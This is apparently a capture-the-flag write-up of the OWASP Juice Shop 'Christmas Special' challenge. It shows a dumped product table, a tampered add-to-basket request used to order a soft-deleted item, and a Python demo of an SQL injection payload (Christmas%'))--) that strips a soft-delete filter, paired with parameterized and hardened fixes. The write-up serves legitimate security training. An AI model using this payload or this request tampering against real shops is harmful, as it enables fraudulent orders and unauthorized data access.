Hacking OWASP’s Juice Shop Pt. 39: Christmas Special

Challenge: 

Name: Christmas Special

Description: Order the Christmas special offer of 2014.

Difficulty: 4 star

Category: Injection

Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html

Tools used:

Burp, FoxyProxy

Resources used:

Database Schema

Methodology: 

Yet again the database dump I performed during the Database Schema challenge pays dividends. The expanded description makes it clear that this is intended to be a much harder task: the 2014 box is soft-deleted (its deletedAt column is set), so the shop's search never returns it, and the challenge sits in the Injection category because the intended route is to get at it through the search query. Being able to simply search the dumped product table for the word "Christmas" turns it into what is basically a 3-star challenge.

Products table, as dumped during the Database Schema challenge (13 rows; createdAt and updatedAt are 2020-11-02 for every row; the id column is not legible in the screenshot):

name                                           image                 price   deletedAt
Apple Juice (1000ml)                           apple_juice.jpg        1.99   NULL
Orange Juice (1000ml)                          orange_juice.jpg       2.99   NULL
Eggfruit Juice (500ml)                         eggfruit_juice.jpg     8.99   NULL
Raspberry Juice (1000ml)                       raspberry_juice.jpg    4.99   NULL
Lemon Juice (500ml)                            lemon_juice.jpg        2.99   NULL
Banana Juice (1000ml)                          banana_juice.jpg       1.99   NULL
OWASP Juice Shop T-Shirt                       fan_shirt.jpg         22.49   NULL
OWASP Juice Shop CTF Girlie-shirt              fan_girlie.jpg        22.49   NULL
OWASP SSL Advanced Forensic Tool (o-saft)      orange_juice.jpg       0.01   NULL
Christmas Super-surprise-Box (2014 Edition)    undefined.jpg         29.99   2014-12-27
Rippertuer Special Juice                       undefined.jpg         16.99   2019-02-01
OWASP Juice Shop sticker (2015/2016 design)    sticker.png          999.99   2017-04-28
OWASP Juice Shop Iron-ons (16pcs)              iron-on.jpg           14.99   NULL

Once I found the product ID number in the database, Burp Suite and FoxyProxy did the rest. I logged into a user account, added any product to that user's basket, intercepted the resulting POST /api/BasketItems/ request, and changed the "ProductId" field to the ID of the 2014 Christmas Super-Surprise-Box. The server accepted it without checking whether that product was still on sale (its deletedAt is set, which is exactly why it never shows up in the shop), so I forwarded the request, checked out the basket, and crossed this challenge off the list.
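As an added example (not code from the blog or from Juice Shop itself), here is a small in-memory SQLite model of the two endpoints involved: a product search that hides soft-deleted rows, and the add-to-basket call whose ProductId I tampered with above. It shows both sides of the story: how a string-built search query lets the deletedAt filter be commented away (the intended Injection route), and why the basket endpoint has to re-check the product and basket server-side rather than trusting the client. Table and column names follow the dump above; the rows, ids, descriptions and handler functions are constructed for illustration, and the vulnerable query is an assumption about how an injectable search would be written, not a copy of the shop's code.

```python
import sqlite3

# Constructed sample data (not the real Juice Shop seed): ids are arbitrary,
# names/prices/deletedAt mirror the dump shown above.
PRODUCTS = [
    (1, "Apple Juice (1000ml)", "The all-time classic.", "apple_juice.jpg", 1.99, None),
    (2, "Christmas Super-surprise-Box (2014 Edition)", "Limited offer.", "undefined.jpg", 29.99, "2014-12-27"),
    (3, "OWASP Juice Shop Iron-ons (16pcs)", "Iron-ons.", "iron-on.jpg", 14.99, None),
]
BASKETS = [(1, 1), (2, 2)]  # (basket id, owning UserId); constructed


def open_db():
    """In-memory SQLite stand-in for the shop database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (id INTEGER PRIMARY KEY, name TEXT, "
                 "description TEXT, image TEXT, price REAL, deletedAt TEXT)")
    conn.executemany("INSERT INTO Products VALUES (?,?,?,?,?,?)", PRODUCTS)
    conn.execute("CREATE TABLE Baskets (id INTEGER PRIMARY KEY, UserId INTEGER)")
    conn.executemany("INSERT INTO Baskets VALUES (?,?)", BASKETS)
    conn.execute("CREATE TABLE BasketItems (id INTEGER PRIMARY KEY AUTOINCREMENT, "
                 "BasketId INTEGER, ProductId INTEGER, quantity INTEGER)")
    return conn


def search_vulnerable(conn, q):
    """Assumed string-built search. The soft-delete filter is only as strong as
    the quoting: a term such as  Christmas%'))--  closes the parentheses and
    turns the rest of the WHERE clause, deletedAt IS NULL included, into a comment."""
    sql = ("SELECT id, name FROM Products WHERE ((name LIKE '%" + q + "%' OR "
           "description LIKE '%" + q + "%') AND deletedAt IS NULL) ORDER BY name")
    return conn.execute(sql).fetchall()


def search_safe(conn, q):
    """Parameterized version: the same payload is matched as a literal pattern
    and the soft-delete filter cannot be detached from the query."""
    sql = ("SELECT id, name FROM Products WHERE ((name LIKE ? OR description LIKE ?) "
           "AND deletedAt IS NULL) ORDER BY name")
    like = "%" + q + "%"
    return conn.execute(sql, (like, like)).fetchall()


def add_basket_item_vulnerable(conn, basket_id, product_id, quantity):
    """Models what the tampered Burp request exploited: the server stores whatever
    ProductId the client sends and never asks whether it is still for sale."""
    cur = conn.execute("INSERT INTO BasketItems (BasketId, ProductId, quantity) VALUES (?,?,?)",
                       (basket_id, product_id, quantity))
    return cur.lastrowid


def add_basket_item_hardened(conn, user_id, basket_id, product_id, quantity):
    """Re-derive every decision from server-side state: the basket must belong to
    the authenticated user, the product must exist and not be soft-deleted, and
    the quantity must be sane. Anything else is rejected before the INSERT."""
    if not isinstance(quantity, int) or quantity < 1:
        raise ValueError("quantity must be a positive integer")
    owner = conn.execute("SELECT UserId FROM Baskets WHERE id = ?", (basket_id,)).fetchone()
    if owner is None or owner[0] != user_id:
        raise PermissionError("basket does not belong to this user")
    row = conn.execute("SELECT deletedAt FROM Products WHERE id = ?", (product_id,)).fetchone()
    if row is None or row[0] is not None:
        raise ValueError("product is not available")
    cur = conn.execute("INSERT INTO BasketItems (BasketId, ProductId, quantity) VALUES (?,?,?)",
                       (basket_id, product_id, quantity))
    return cur.lastrowid


if __name__ == "__main__":
    db = open_db()
    print("plain search:   ", search_vulnerable(db, "Christmas"))          # []
    print("injected search:", search_vulnerable(db, "Christmas%'))--"))    # the 2014 box
    print("safe search:    ", search_safe(db, "Christmas%'))--"))          # []
    print("vulnerable add: ", add_basket_item_vulnerable(db, 1, 2, 1))     # succeeds
    try:
        add_basket_item_hardened(db, 1, 1, 2, 1)
    except ValueError as e:
        print("hardened add:   ", e)                                        # rejected
```

The hardening matters independently of the injection: even with the search fully parameterized, the 2014 box is still reachable by anyone who learns its id (from a dump, a guess, or an old link) until the basket endpoint itself refuses soft-deleted products and foreign baskets.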

Intercepted request (values that are not legible in the screenshot are shown as <...>):

POST /api/BasketItems/ HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:...) ...
Accept: application/json, text/plain, */*
Accept-Language: en-US, ...
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOi...
Content-Type: application/json
Content-Length: 43
Origin: http://localhost:3000
Connection: close
Referer: http://localhost:3000/
Cookie: language=en; welcomebanner_status=dismiss...

{"ProductId": <id of the 2014 Christmas box>, "BasketId": <...>, "quantity": <...>}

Response:

HTTP/1.1 200 OK
Access-Control-Allow-Origin: ...
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
Content-Type: application/json; charset=utf-8
Content-Length: 158
ETag: W/"9e-M8uaR7h1Ag1feSXsvoS9pYfZve1"
Vary: Accept-Encoding
Date: Thu, 05 Nov 2020 23:21 GMT
Connection: close

{"status": "success", "data": {"id": 18, "ProductId": <...>, "BasketId": <...>, "quantity": <...>, "updatedAt": "2020-11-05T23:21:21.817Z", "createdAt": "2020-11-05T23:21:21.817Z"}}
[Screenshot: Your Basket (admin@juice-sh.op) now lists Christmas Super-Surprise-Box (2014 Edition), quantity 1, Total Price 29.99¤, with the note "You will gain 3 Bonus Points from this order!"]

You successfully solved a challenge: Christmas Special (Order the Christmas special offer of 2014.)

[Screenshot: order confirmation. "Thank you for your purchase! Your order has been placed and is being processed. You can check for status updates on our Track Orders page. Your order will be delivered in 5 days." Delivery Address: Administrator, 0815 Test street, Test, Test, 4711, Test; Phone Number 1234567890. Order Summary: Christmas Super-Surprise-Box (2014 Edition), price 29.99¤, quantity 1; Items 29.99¤, Delivery 0.00¤, Promotion 0.00¤, Total Price 29.99¤.]

Prevention and Mitigation Strategies:

OWASP SQL Injection Prevention Cheat Sheet
